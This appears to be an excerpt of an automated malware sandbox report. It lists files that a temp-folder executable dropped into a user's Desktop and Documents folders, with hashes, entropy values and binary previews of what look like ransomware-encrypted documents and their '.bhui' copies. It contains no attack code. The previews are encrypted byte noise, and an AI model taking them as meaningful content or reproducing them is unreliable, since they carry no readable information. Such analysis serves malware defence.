SSDEEP:	24:94dRVxPI71xps/AWv85aeGUTEsQubElvHg6abDSJUm+uHNCDtdo2oK2VuU9uFZKR:94dVoiYWk9bQubEJ7MDSWmxIRhoVACuG
MD5:	C263ADA4D9CCF26F8B51889DC8654BFC
SHA1:	B4C359EC6D9EE934722EDDA678003FC589ECB911
SHA-256:	34023E92788F16853F7AD7D0676B80FA95AF8FE3541F6933344B6C944C5C9EA2
SHA-512:	BA8447F34C2A566187AD897479ABC477079C19CC3CFE8A9158B5E3A7738607747BD446684C3F4DE62BE6BFB7DE71FA063C77B009564E19B325E24C4F84942F9B
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ....5...'...Ai.-..t-..I....rM.6DF..q..`.&..#....a..jS..8{..G,.W.w.B.~.c/(UK.......g.ziX..uS.Qa...c........A...@..{.s.....%.v,..t....IC.eV..B..:...F.... c^....$.%.N.$.6.....,.^....5..j1..[........6jK.......1...#..;./......y.2...\|...;C.r...v+....&.PX..`_.n.+.}._./.a....f.b.Q.1g...k..0...y....E.].b.....].}F..aj.E...b......U......YY!..i.k.H8A..D%}#./.)E....?P.R0..x.fK.....mkx[.8.)..Z..>.!\..........!~...9A.O.......6I........2=.O.+.\Z.H..;....^...6..r.@.U.s.W.!:.........g.j...[.R).0.....;.C..p~.Z.(.b.4X.E9...<./..4.q..u.'......R...L....%.b}@.....u5.'...r....c...s.MU0.2lOR..........B.Mjg.A.hoT{.j.Up..v.a..2.-.`.......P>..]D....Y.Rn.yt...I'....) .....sf..C.r.K..H.<..k..H...8d.E.B.'.q.......:..9!.N..{~T.5..v$V..B.t!.....y.#..BS.Z@.)p.{..(.%...........B-i......^QA.......;..j..{..F&....;.r..d.......\|.=..4..2._....h..I.{...b..m)I.@E..-.D...J... H+J!.c........#{`9..-d..JZ.g..u.F...yo.....D..KVQ...U......O......{..9(,`bkVYg....%(.v.^.E..8..

C:\Users\user\Desktop\ZIPXYXWIOY\LIJDSFKJZG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87354055549038
Encrypted:	false
SSDEEP:	24:UG3KMZCtZ6+WI6PGcX5m2u87phWPBKzNjSzE79XOzre71sSSwW0I5pWbD:UcCe+WPPGcwc7phSBA2zExylxx52D
MD5:	51D2F88A9066C3EB029053A47E3BF594
SHA1:	A6AF80A7042367BFB64ECE2E38A2306E5ADFC3AC
SHA-256:	F41BB1DC003CEAE5905B8166DD5055246A0C2A19099468C9FE67F0D5B57F1222
SHA-512:	CFE7AB84AC1E384C3E8325874576C9FF0EAD944C6D83DFC05020D51101F0AFF4073F61D09CB26754CC35423E99E33FF4A5612A2360117D962DAD7915722D0FD5
Malicious:	false
Reputation:	unknown
Preview:	LIJDS...J.....&........W.{U...E.... $.)?.6..xRQx....k...).....2aZ;f.....!=`..L..{Um.......l.@.....~.D..`..%?.E......u\L.`......Y.%.R....Ds....x.)...k.8x....5.../.47.61.y()..C.B.#R.gu/Q...Y..lg...6..m.C....J..{?<..O.h......z1.[V~..&......3..C......kO4...=.......!t..._.".m.9..d..q.....`.}.....]..z>t.K...R........?D.~...k3.".:O..WM...x...-.Q._$X.w.+c!.yvG....D..h?=)..@.]^1.GRDwe.....].{.....M.B..G1.'.........J..>v.?....,.`......^.....c.....j...b7?.i.`.{.t.14l...7".."I..j.....E.Z];L......=q..R3.2GG~..x......gZ...".U...k..;..`..\cw...8....S^.S..{..r..p...]?..[.>.....4......@l{.s..UL.'..!nA....l............i.r.o..b.Y....<H..[Q...1n......I~..,.2..%T.....8t..".:....h..bp..B.11S......W..n...N.Y...T1......M.J.j..]G`0J..)....#&....._.P...qw.&....?.S......!.p8xvT>:...-.......dI.e..;._:...wog..]..d.c.QA..{d.\.v.. .Cz:....yf9...A_.....p.....l#..u.\|.![.L=...Fi.t.;.7....7B.ne.A.B.[\W-t.\..S..j.....)H.+ I.h.....w.N..@Ym..!.%. C]..b... m....r&.........Er......

C:\Users\user\Desktop\ZIPXYXWIOY\LIJDSFKJZG.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87354055549038
Encrypted:	false
SSDEEP:	24:UG3KMZCtZ6+WI6PGcX5m2u87phWPBKzNjSzE79XOzre71sSSwW0I5pWbD:UcCe+WPPGcwc7phSBA2zExylxx52D
MD5:	51D2F88A9066C3EB029053A47E3BF594
SHA1:	A6AF80A7042367BFB64ECE2E38A2306E5ADFC3AC
SHA-256:	F41BB1DC003CEAE5905B8166DD5055246A0C2A19099468C9FE67F0D5B57F1222
SHA-512:	CFE7AB84AC1E384C3E8325874576C9FF0EAD944C6D83DFC05020D51101F0AFF4073F61D09CB26754CC35423E99E33FF4A5612A2360117D962DAD7915722D0FD5
Malicious:	false
Reputation:	unknown
Preview:	LIJDS...J.....&........W.{U...E.... $.)?.6..xRQx....k...).....2aZ;f.....!=`..L..{Um.......l.@.....~.D..`..%?.E......u\L.`......Y.%.R....Ds....x.)...k.8x....5.../.47.61.y()..C.B.#R.gu/Q...Y..lg...6..m.C....J..{?<..O.h......z1.[V~..&......3..C......kO4...=.......!t..._.".m.9..d..q.....`.}.....]..z>t.K...R........?D.~...k3.".:O..WM...x...-.Q._$X.w.+c!.yvG....D..h?=)..@.]^1.GRDwe.....].{.....M.B..G1.'.........J..>v.?....,.`......^.....c.....j...b7?.i.`.{.t.14l...7".."I..j.....E.Z];L......=q..R3.2GG~..x......gZ...".U...k..;..`..\cw...8....S^.S..{..r..p...]?..[.>.....4......@l{.s..UL.'..!nA....l............i.r.o..b.Y....<H..[Q...1n......I~..,.2..%T.....8t..".:....h..bp..B.11S......W..n...N.Y...T1......M.J.j..]G`0J..)....#&....._.P...qw.&....?.S......!.p8xvT>:...-.......dI.e..;._:...wog..]..d.c.QA..{d.\.v.. .Cz:....yf9...A_.....p.....l#..u.\|.![.L=...Fi.t.;.7....7B.ne.A.B.[\W-t.\..S..j.....)H.+ I.h.....w.N..@Ym..!.%. C]..b... m....r&.........Er......

C:\Users\user\Desktop\ZIPXYXWIOY\SNIPGPPREP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8527734470475385
Encrypted:	false
SSDEEP:	24:CzORlda782eTGifRu2+6lN682uTkecACKys1Z1PU4UKoZWydMZOEbRbeqWbD:JzdBTtfL+Sw8XTkhACKysNU4asJ0wRbs
MD5:	5A6192FA690BDA21AA6656C743BB5CB7
SHA1:	B3165B2ECF72AFC636ECA03D0AEE6A6B9AC407F1
SHA-256:	021C477BEAB8901D7FAFE8995317BEE5403D22C28C003367A93E50B5C210CB3A
SHA-512:	EE34D4839E1C07A2D53BC9B5897D9F35F2CCFAFB74F0AA98C5AFF89706B780590153ECD83F211F2C00679C8D7EC2C49BAA9619B6B84D1B584C83917617B44E0D
Malicious:	false
Reputation:	unknown
Preview:	SNIPG{.......+:x]."D.Y}#.E..l.P).N.C4z.`M......!E^.k8.....\|..2.. .3.1...T.....E.6.M.2.._k..Un.3(...L..n.m...>.1q...ck...C......$.z ..5....=.yn.-M.....f.C...9.........Ka@.K~UzoW.YRb..WL.d........!...u;z.=K...J0V.a.....5.q..K..X.s.Q...v.lRf0.G.uo#...C)x....0.....BY.S."L.Q<.7PB[.Y...b!T....D.M.......0..=[....t.7..fV.[....nY.g.b8W_-.......S...x.[T..LK.......<...@..N)..h.`.....j.s...{.iF..CC..%....7Zf.GY..bw..j.....K......&...........?.Fa......j.......m..az^....AF....Q^..m..\|.w.........^.J2.v....>n....q..5,C...HY5....s....9..s.P,=...EjH.P.'..mup..j..8.....1..<L.v.......(L'.w...mv..h.z.Fp..yF.8..Cn.i.i... ...'..gp6.........x..(H}W.....I...+.il...FD.N+\...}_\...c.U.'..?1.6..9..mo...d..3..QP.S81.H.P..Y]8.4....q7.c...`./d..U7...O.0!....V..CO..M9} N..:..........C..q9.W.N.1....c.R'..x.9.%g.A..RY..&.W2..z.s.BK>.h.6...#.C....3.@..)..(".=}..S......cQ....G.=UC.o.?[.v..U..d.T...\|.E}..I.Di.-t.v.v..z.U....N..q.p.8..7o:.MB.1..%..f..(v..8...

C:\Users\user\Desktop\ZIPXYXWIOY\SNIPGPPREP.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8527734470475385
Encrypted:	false
SSDEEP:	24:CzORlda782eTGifRu2+6lN682uTkecACKys1Z1PU4UKoZWydMZOEbRbeqWbD:JzdBTtfL+Sw8XTkhACKysNU4asJ0wRbs
MD5:	5A6192FA690BDA21AA6656C743BB5CB7
SHA1:	B3165B2ECF72AFC636ECA03D0AEE6A6B9AC407F1
SHA-256:	021C477BEAB8901D7FAFE8995317BEE5403D22C28C003367A93E50B5C210CB3A
SHA-512:	EE34D4839E1C07A2D53BC9B5897D9F35F2CCFAFB74F0AA98C5AFF89706B780590153ECD83F211F2C00679C8D7EC2C49BAA9619B6B84D1B584C83917617B44E0D
Malicious:	false
Reputation:	unknown
Preview:	SNIPG{.......+:x]."D.Y}#.E..l.P).N.C4z.`M......!E^.k8.....\|..2.. .3.1...T.....E.6.M.2.._k..Un.3(...L..n.m...>.1q...ck...C......$.z ..5....=.yn.-M.....f.C...9.........Ka@.K~UzoW.YRb..WL.d........!...u;z.=K...J0V.a.....5.q..K..X.s.Q...v.lRf0.G.uo#...C)x....0.....BY.S."L.Q<.7PB[.Y...b!T....D.M.......0..=[....t.7..fV.[....nY.g.b8W_-.......S...x.[T..LK.......<...@..N)..h.`.....j.s...{.iF..CC..%....7Zf.GY..bw..j.....K......&...........?.Fa......j.......m..az^....AF....Q^..m..\|.w.........^.J2.v....>n....q..5,C...HY5....s....9..s.P,=...EjH.P.'..mup..j..8.....1..<L.v.......(L'.w...mv..h.z.Fp..yF.8..Cn.i.i... ...'..gp6.........x..(H}W.....I...+.il...FD.N+\...}_\...c.U.'..?1.6..9..mo...d..3..QP.S81.H.P..Y]8.4....q7.c...`./d..U7...O.0!....V..CO..M9} N..:..........C..q9.W.N.1....c.R'..x.9.%g.A..RY..&.W2..z.s.BK>.h.6...#.C....3.@..)..(".=}..S......cQ....G.=UC.o.?[.v..U..d.T...\|.E}..I.Di.-t.v.v..z.U....N..q.p.8..7o:.MB.1..%..f..(v..8...

C:\Users\user\Desktop\ZIPXYXWIOY\VWDFPKGDUF.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8497719888792385
Encrypted:	false
SSDEEP:	24:jsfmUDeseWCixAbyWTuxZ1TfM0GOvQC8LGBDcEaxcnKNXkLF7RUffTssfZqRWbD:qJ4bixMyWixTfMC8LYasK5kpVATsybD
MD5:	3122008F5A758E3002D41B02F3E50BF8
SHA1:	61DDC54DFE8C4D098439C42A6533EC2EE4FD8269
SHA-256:	AE1E1388F49603FFE19DCE5C361D43FFF5FF0B5663D7061128B1167772918AD8
SHA-512:	9F4BD1BEF439EBA450081B576E7D3DB3CFFC7B78F63BD2CA2A05606CABF5984CD3478F8FE428C2E5BB3C00754B141A577E45AA7B814F287D81C327305C227643
Malicious:	false
Reputation:	unknown
Preview:	VWDFPMO.u.._..A.;g_7...g...\|.....t.TV..o.r..w]8;.....?..".V[.<.....Yy.J...L...J[H.>..l7.t=vl....]......=sl?.G.....).qCn{..Y,.....b1.x......m........v6.j.....;.....'.....L.Z$n.;AmD.d......3.Y....SK...'..`.'..[w.f@.+9Jn.-.1.',....N4K...-.ww...=.......G.c.]Jp...a.0. vW.9....B}pB.=.....J_4...s.X...^....,..4.+......\1z.dcq..e.{.=I+SW.sr.....)...V..V.R/Kc2m....E[~nY.'...U..k}..i....[.MJ.k...3....;."....U..g..."..d... HJ.[.P.........N...y...[..v...........T.....=...._.R.V...1....'h..0......K..4..E..k.].......c.f..x.N.-.pdi.F=...1.&.9.A1.W.k.k...S...?.MpW~.G..i3.J...!.N8r...RU..x'/.2A........(..k.r8.>L..$..7..Ec....XRb.Q.6..Ku....6.1.....7....{n....8..Z. -...U......p.>;b^._.ES=....J..=.....J6..3.../.T.....2@........8.x..(...=x).K..E(......@...f..I\|.#..$........0........&......_C.4..D.(F.H8.Q .:4p..k.?%..$.....\8.....!.o:..pT.9...K..NA.g..u.R...d...N.^..:.).;..[.]I.W.O..!..,..a.x.G..X...t....%.^...%...=.....;[8..2....h./..].3,:....

C:\Users\user\Desktop\ZIPXYXWIOY\VWDFPKGDUF.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8497719888792385
Encrypted:	false
SSDEEP:	24:jsfmUDeseWCixAbyWTuxZ1TfM0GOvQC8LGBDcEaxcnKNXkLF7RUffTssfZqRWbD:qJ4bixMyWixTfMC8LYasK5kpVATsybD
MD5:	3122008F5A758E3002D41B02F3E50BF8
SHA1:	61DDC54DFE8C4D098439C42A6533EC2EE4FD8269
SHA-256:	AE1E1388F49603FFE19DCE5C361D43FFF5FF0B5663D7061128B1167772918AD8
SHA-512:	9F4BD1BEF439EBA450081B576E7D3DB3CFFC7B78F63BD2CA2A05606CABF5984CD3478F8FE428C2E5BB3C00754B141A577E45AA7B814F287D81C327305C227643
Malicious:	false
Reputation:	unknown
Preview:	VWDFPMO.u.._..A.;g_7...g...\|.....t.TV..o.r..w]8;.....?..".V[.<.....Yy.J...L...J[H.>..l7.t=vl....]......=sl?.G.....).qCn{..Y,.....b1.x......m........v6.j.....;.....'.....L.Z$n.;AmD.d......3.Y....SK...'..`.'..[w.f@.+9Jn.-.1.',....N4K...-.ww...=.......G.c.]Jp...a.0. vW.9....B}pB.=.....J_4...s.X...^....,..4.+......\1z.dcq..e.{.=I+SW.sr.....)...V..V.R/Kc2m....E[~nY.'...U..k}..i....[.MJ.k...3....;."....U..g..."..d... HJ.[.P.........N...y...[..v...........T.....=...._.R.V...1....'h..0......K..4..E..k.].......c.f..x.N.-.pdi.F=...1.&.9.A1.W.k.k...S...?.MpW~.G..i3.J...!.N8r...RU..x'/.2A........(..k.r8.>L..$..7..Ec....XRb.Q.6..Ku....6.1.....7....{n....8..Z. -...U......p.>;b^._.ES=....J..=.....J6..3.../.T.....2@........8.x..(...=x).K..E(......@...f..I\|.#..$........0........&......_C.4..D.(F.H8.Q .:4p..k.?%..$.....\8.....!.o:..pT.9...K..NA.g..u.R...d...N.^..:.).;..[.]I.W.O..!..,..a.x.G..X...t....%.^...%...=.....;[8..2....h./..].3,:....

C:\Users\user\Desktop\ZIPXYXWIOY\ZIPXYXWIOY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869046619917201
Encrypted:	false
SSDEEP:	24:VbYi6XUfvDcuW2xmJpXzYJI2xhIdnkGnbIlPIcq0VYfyyGZDbX58UWbD:VbYi6QTx6YGyIdx8xIcq0VYfPg/ipD
MD5:	ADCA0D56462CB53D9F151A956A8A50FA
SHA1:	53A9BD13E569E4D7B2CDD931141ECC5E56F9F116
SHA-256:	EB5E46B1615212DF22547496EE9BAC160E106BC61C8789C277DECE38063C4C36
SHA-512:	0764B83304079F2FD6694C562E8EE707241831845A48F57B6B22E2A2FB2E7627504DC784761330C6F10FC4B9D9D31789F624AB7242D063AC91FAD6063D26F2D9
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY....QVt^.>...@M.R2._4..e.Nf.QB.WU..{.'..5;..<i:..4K.....(..f.n.c.vY.&.w.`r..^..Yg.=.....^.^r...:..eR..,h#~I,...6+^.I.....X./..........5;.....\....F..VD3.=3.~c..S".-2..T.@....%.#.<....+.=.....yS.W...4z#\....V..'...l.N...?{...b.:2....f...2;..d.#...uk....m0.+..T.z..H..p...r...ZQ.[jm.._......kX.D.kfQ..%l.iU..c&.i..z..!io.u.....V.&c...5....$.7....."..4.k...!]...3...,...r...7L.....c8......JA...M.f....7.J.K#.....&V"...mu.-.[p.......Jf(..~...$.hyA..U..J<=.!>;...5.....=./4.%..D.\|.I..4...H...\...i..~iAM..N[...O..,.B..8...<8m..wM....P.B.l...._..C.zS.............I.v},...Y..".<A.]+.z.Ol....%..y....53...LU..(...$.....k1.VN...bj.f?$..6<=.V..\..D.[`....E..@lv.*4._5.e.....".:.pK%.E....X........jH.I...~..:.t.m}.;....h..z-....].1&..,.....H......7.l..k^2...G'..<..^9I.....qz.a....8]..b=rT.....C.f_..[..AE#.......aK+.%.^N..6.....>..n......%,.R.5...........H...U..Z.<e.db...:."..8?......Rk......Z..,..'...'.~..qVU..U.[..X...F.I.l..;.>..e.Qh.DV

C:\Users\user\Desktop\ZIPXYXWIOY\ZIPXYXWIOY.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869046619917201
Encrypted:	false
SSDEEP:	24:VbYi6XUfvDcuW2xmJpXzYJI2xhIdnkGnbIlPIcq0VYfyyGZDbX58UWbD:VbYi6QTx6YGyIdx8xIcq0VYfPg/ipD
MD5:	ADCA0D56462CB53D9F151A956A8A50FA
SHA1:	53A9BD13E569E4D7B2CDD931141ECC5E56F9F116
SHA-256:	EB5E46B1615212DF22547496EE9BAC160E106BC61C8789C277DECE38063C4C36
SHA-512:	0764B83304079F2FD6694C562E8EE707241831845A48F57B6B22E2A2FB2E7627504DC784761330C6F10FC4B9D9D31789F624AB7242D063AC91FAD6063D26F2D9
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY....QVt^.>...@M.R2._4..e.Nf.QB.WU..{.'..5;..<i:..4K.....(..f.n.c.vY.&.w.`r..^..Yg.=.....^.^r...:..eR..,h#~I,...6+^.I.....X./..........5;.....\....F..VD3.=3.~c..S".-2..T.@....%.#.<....+.=.....yS.W...4z#\....V..'...l.N...?{...b.:2....f...2;..d.#...uk....m0.+..T.z..H..p...r...ZQ.[jm.._......kX.D.kfQ..%l.iU..c&.i..z..!io.u.....V.&c...5....$.7....."..4.k...!]...3...,...r...7L.....c8......JA...M.f....7.J.K#.....&V"...mu.-.[p.......Jf(..~...$.hyA..U..J<=.!>;...5.....=./4.%..D.\|.I..4...H...\...i..~iAM..N[...O..,.B..8...<8m..wM....P.B.l...._..C.zS.............I.v},...Y..".<A.]+.z.Ol....%..y....53...LU..(...$.....k1.VN...bj.f?$..6<=.V..\..D.[`....E..@lv.*4._5.e.....".:.pK%.E....X........jH.I...~..:.t.m}.;....h..z-....].1&..,.....H......7.l..k^2...G'..<..^9I.....qz.a....8]..b=rT.....C.f_..[..AE#.......aK+.%.^N..6.....>..n......%,.R.5...........H...U..Z.<e.db...:."..8?......Rk......Z..,..'...'.~..qVU..U.[..X...F.I.l..;.>..e.Qh.DV

C:\Users\user\Documents\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852580429772681
Encrypted:	false
SSDEEP:	24:L6wcYokfEwLCZmKk/eH51shvXD7EzEjntA0yDr4rBG74pXCRPgis+gIkx/d7knWX:bf1CAKQeHgfAWntA0yDr4rB84pyRdIRt
MD5:	A5AE8954966341253926F7DA8EE6F3CB
SHA1:	9D57EE785EE12833877C081A4A51F93AE4180B16
SHA-256:	0364E8A2CF6DEFEBBEC03FB55254A28E6F619C8CC373E47B6B05A04C8C291904
SHA-512:	D3E548415770C7414FAFA89D772F1A8AC0D0CACB359C42E4CCA826018E8F2B28C962D85D9FCD2E87E02521AE6DF64888BD9E2C2815439E742F07592B349E1B27
Malicious:	false
Reputation:	unknown
Preview:	CZQKS....3T...'........AH~9.....CL....E...$:.(W..5_.q..8....5>.r..I.h0......k.@..p;.E.....Z.WN.a]....$7[.8... ..,.t..w..<4"....o..b.t..G.K.:.{&p......U.{.........lH[mz"..]\|.5.=....ca..U9.....vz>...o.to..G..U.M..B_XEl.:.?J...*9...7.v../.....P.Uk...i..kAp.;.0....y...... .]..pd.....,.....U.Q+.k..A!8m.C..l.El...~tg.3.H.....,....,..(..OGq.V.VH.~..}......0Dox...g.&.5!.r.'..x:..r.6..#v.vK...L.7U..8Ma.Xv.Uo\.....1....0.@^..M....?.w...o...I.i.w)d.r.....(.W..1&.H..7..:...P...e..U.;.....j.h}>...N...U..v...x.D.?iU..;;.....4.............E...".d...%..D.y...O..D.E..$.._..Y.g..yK4...5.x.G....)^a...j..hQ.M&..a.-...bK.y.`..Qkr....1M....T..pjF{.2....G..].).....B...{...c6....5.o.wL#...5.+v..(.B..2. ..F..s..4\|]79....}..T/..=/{.../..Ge....t['R.w.2...6...I...K.../i...).x.o..L./X.ZMi<..`j..`....Y.K+).._U].!a.....;o.%.GI..w(.E.a....-8Z.....4.:/.4.i.rH.N...C..c.E...+........'..rP.)....B.@i....D.Sq..c#Y....L..T...?.+D.>Oc:.G.F.....k!<..Ow`s,.......D..vu..H..k

C:\Users\user\Documents\CZQKSDDMWR.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852580429772681
Encrypted:	false
SSDEEP:	24:L6wcYokfEwLCZmKk/eH51shvXD7EzEjntA0yDr4rBG74pXCRPgis+gIkx/d7knWX:bf1CAKQeHgfAWntA0yDr4rB84pyRdIRt
MD5:	A5AE8954966341253926F7DA8EE6F3CB
SHA1:	9D57EE785EE12833877C081A4A51F93AE4180B16
SHA-256:	0364E8A2CF6DEFEBBEC03FB55254A28E6F619C8CC373E47B6B05A04C8C291904
SHA-512:	D3E548415770C7414FAFA89D772F1A8AC0D0CACB359C42E4CCA826018E8F2B28C962D85D9FCD2E87E02521AE6DF64888BD9E2C2815439E742F07592B349E1B27
Malicious:	false
Reputation:	unknown
Preview:	CZQKS....3T...'........AH~9.....CL....E...$:.(W..5_.q..8....5>.r..I.h0......k.@..p;.E.....Z.WN.a]....$7[.8... ..,.t..w..<4"....o..b.t..G.K.:.{&p......U.{.........lH[mz"..]\|.5.=....ca..U9.....vz>...o.to..G..U.M..B_XEl.:.?J...*9...7.v../.....P.Uk...i..kAp.;.0....y...... .]..pd.....,.....U.Q+.k..A!8m.C..l.El...~tg.3.H.....,....,..(..OGq.V.VH.~..}......0Dox...g.&.5!.r.'..x:..r.6..#v.vK...L.7U..8Ma.Xv.Uo\.....1....0.@^..M....?.w...o...I.i.w)d.r.....(.W..1&.H..7..:...P...e..U.;.....j.h}>...N...U..v...x.D.?iU..;;.....4.............E...".d...%..D.y...O..D.E..$.._..Y.g..yK4...5.x.G....)^a...j..hQ.M&..a.-...bK.y.`..Qkr....1M....T..pjF{.2....G..].).....B...{...c6....5.o.wL#...5.+v..(.B..2. ..F..s..4\|]79....}..T/..=/{.../..Ge....t['R.w.2...6...I...K.../i...).x.o..L./X.ZMi<..`j..`....Y.K+).._U].!a.....;o.%.GI..w(.E.a....-8Z.....4.:/.4.i.rH.N...C..c.E...+........'..rP.)....B.@i....D.Sq..c#Y....L..T...?.+D.>Oc:.G.F.....k!<..Ow`s,.......D..vu..H..k

C:\Users\user\Documents\GLTYDMDUST.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859278041753362
Encrypted:	false
SSDEEP:	24:qQgG6wk2BwvpHj6JxO675OYLyULo9cFLQ73iHyUaHpXiEhLIe6fy2dUiOKnCtHUR:oG6Im6Js67ZLyU8cFkriKJbLmfZpCt0R
MD5:	33AEA5CE6869FE4A89C048F5400ECA60
SHA1:	69AAFE6DB9B9AE5CF5425DE7CB2AF0B2862B9F37
SHA-256:	3141C3865197CBDA67DC2DE10E410D21385F3C5626F07BADD03654EBD43AC420
SHA-512:	D9D4B71795DF2A0C45E86EC1AA622E67B295566D3BC33E2A81BA82FEDC3264D79226C534047E12FF6D42EDF43283C4535A053E5EFAF5C4DEA1CCFAD0A54C4473
Malicious:	false
Reputation:	unknown
Preview:	GLTYDo[.N.qa._M.g>.U..K..-..Bx..\|6.....[.yS8..T.D.HJ......\e..j.6.........'$....lI..0=#.c...}...]../..z...2.i.&c4k.R=...[..]V...]..0dp4NBu...o.......[hJ..H..BO..b....k=.......'...^n.$)."S..k......V.U+..[.S..%...p.B...d."..........I.`..:~..Ir..X.00..l.H.a..DA.@j.A.....3".=`5..I...C1v3....<.pHC.%U"5.n...9....5..?..s{......Lj.W.h...wJJ~q..FL.....k.s%j....J?f.M..y6^......C.F4.q@..d'..@.s.Z...u.Oj..g..P.....6.... 5...j;..'........G).X...{....=..&g.7..#P,...\|..a....i,.......TD.n.7i..X..G.d>W..(..........4.lY..;&.P............&y.s:..-...\|.}......4...D.%....r..'j.7...b.f.QEMZ'...}.<.y..TI..Y....=....H..u8df.N.g..l:L..`...(.K.....ZE...X..C6.rC.~7.5x.W..Z.e....u....Kn....6./.u.;NF..l.].37...Lg....S.8.....b.........[~.f.Y."...A.1..IZ.R.*.Xf.wi(g..cr.v...8..'...Q.../m..J...r..y.....4.....S.k...6......zR_.p..#...3.E.9=.".m...`.....0.....P.g.-m...'.._..&........C...?...,.Y5a.y ...}o.[..z..a...P' ..U..pX....m..M..&..L!@..I...s... .5B/W..'.@..w

C:\Users\user\Documents\GLTYDMDUST.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859278041753362
Encrypted:	false
SSDEEP:	24:qQgG6wk2BwvpHj6JxO675OYLyULo9cFLQ73iHyUaHpXiEhLIe6fy2dUiOKnCtHUR:oG6Im6Js67ZLyU8cFkriKJbLmfZpCt0R
MD5:	33AEA5CE6869FE4A89C048F5400ECA60
SHA1:	69AAFE6DB9B9AE5CF5425DE7CB2AF0B2862B9F37
SHA-256:	3141C3865197CBDA67DC2DE10E410D21385F3C5626F07BADD03654EBD43AC420
SHA-512:	D9D4B71795DF2A0C45E86EC1AA622E67B295566D3BC33E2A81BA82FEDC3264D79226C534047E12FF6D42EDF43283C4535A053E5EFAF5C4DEA1CCFAD0A54C4473
Malicious:	false
Reputation:	unknown
Preview:	GLTYDo[.N.qa._M.g>.U..K..-..Bx..\|6.....[.yS8..T.D.HJ......\e..j.6.........'$....lI..0=#.c...}...]../..z...2.i.&c4k.R=...[..]V...]..0dp4NBu...o.......[hJ..H..BO..b....k=.......'...^n.$)."S..k......V.U+..[.S..%...p.B...d."..........I.`..:~..Ir..X.00..l.H.a..DA.@j.A.....3".=`5..I...C1v3....<.pHC.%U"5.n...9....5..?..s{......Lj.W.h...wJJ~q..FL.....k.s%j....J?f.M..y6^......C.F4.q@..d'..@.s.Z...u.Oj..g..P.....6.... 5...j;..'........G).X...{....=..&g.7..#P,...\|..a....i,.......TD.n.7i..X..G.d>W..(..........4.lY..;&.P............&y.s:..-...\|.}......4...D.%....r..'j.7...b.f.QEMZ'...}.<.y..TI..Y....=....H..u8df.N.g..l:L..`...(.K.....ZE...X..C6.rC.~7.5x.W..Z.e....u....Kn....6./.u.;NF..l.].37...Lg....S.8.....b.........[~.f.Y."...A.1..IZ.R.*.Xf.wi(g..cr.v...8..'...Q.../m..J...r..y.....4.....S.k...6......zR_.p..#...3.E.9=.".m...`.....0.....P.g.-m...'.._..&........C...?...,.Y5a.y ...}o.[..z..a...P' ..U..pX....m..M..&..L!@..I...s... .5B/W..'.@..w

C:\Users\user\Documents\GLTYDMDUST.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826289023414639
Encrypted:	false
SSDEEP:	24:HcdoEBTHzn41sibDfRbJ7Wir3xLfY8XgaJd6pVFqug5Y1Mbr4V5oEZkRXs1BHIWX:Hkt4VRFbrZfFgab6HFXN1vVfZSXmtD
MD5:	3D55CF379D6A0FB353F906BDE409F7EA
SHA1:	38AE2344A516DB36FD4070389E4BACEC5DF3FAE6
SHA-256:	138559474FD82313A1C230188F638116884B17C2413CF5663A39D0B1E1AAE32E
SHA-512:	8427B54BB70FE468A053CEF01DBF02FEC80151E3C8B41C3DA893DCF3F92AE138C25C1BD6F2DA31290C4569ADD899F045E8F5D0AF8436735FA24F6F65298576AF
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.t43......-....[.LV.7.................4....s..q...Jw.....z}E..,{......D^.....mju..,......P...7<..o.S,..o.2...h..d.b.~..lz...bj..i.k.9...Q.{]....D.?...?.L.\|....\|.}../4......_y'.........m\F...._0.%.`]....w.=}...x.p...\|...c...........K.......+.p.2W.@8...$_.g.......Z3.......2L%f.. .T`n.,..01OX...G..uI....B..r.N..$...8..6:...P.aYB.?.a..F].\..T4h..,..r......T.(.\..C......v.P.>)y.+pT.+../.\z..=;Y..jO..b......#.51.e.].{.:g%.8.-...)t<...# .O.<...=.f..G.Y....g....^..L...N.[...2S...6F@)...w\|.._.\|.H.xQXT.J.{6.\.p.'4..+...>.#.5.....Vv......q{P.>HAL....k../4...Fil.w..E..9.q..,6y.1G..H.......z.q.`{..M2S@m..R......xJ.\|.".T...&f.hzj.X.qF.O..1..))k.^Z.,..QI.R..S....4....+hI.i....Jb.y.......*..m.._8..O..'...-....,.(..b^....bX0t9F..U....V..k....{...J{...8+I.^<..ND.S.......C...... ..X...9..y......,..../..h...W.....z..b..... 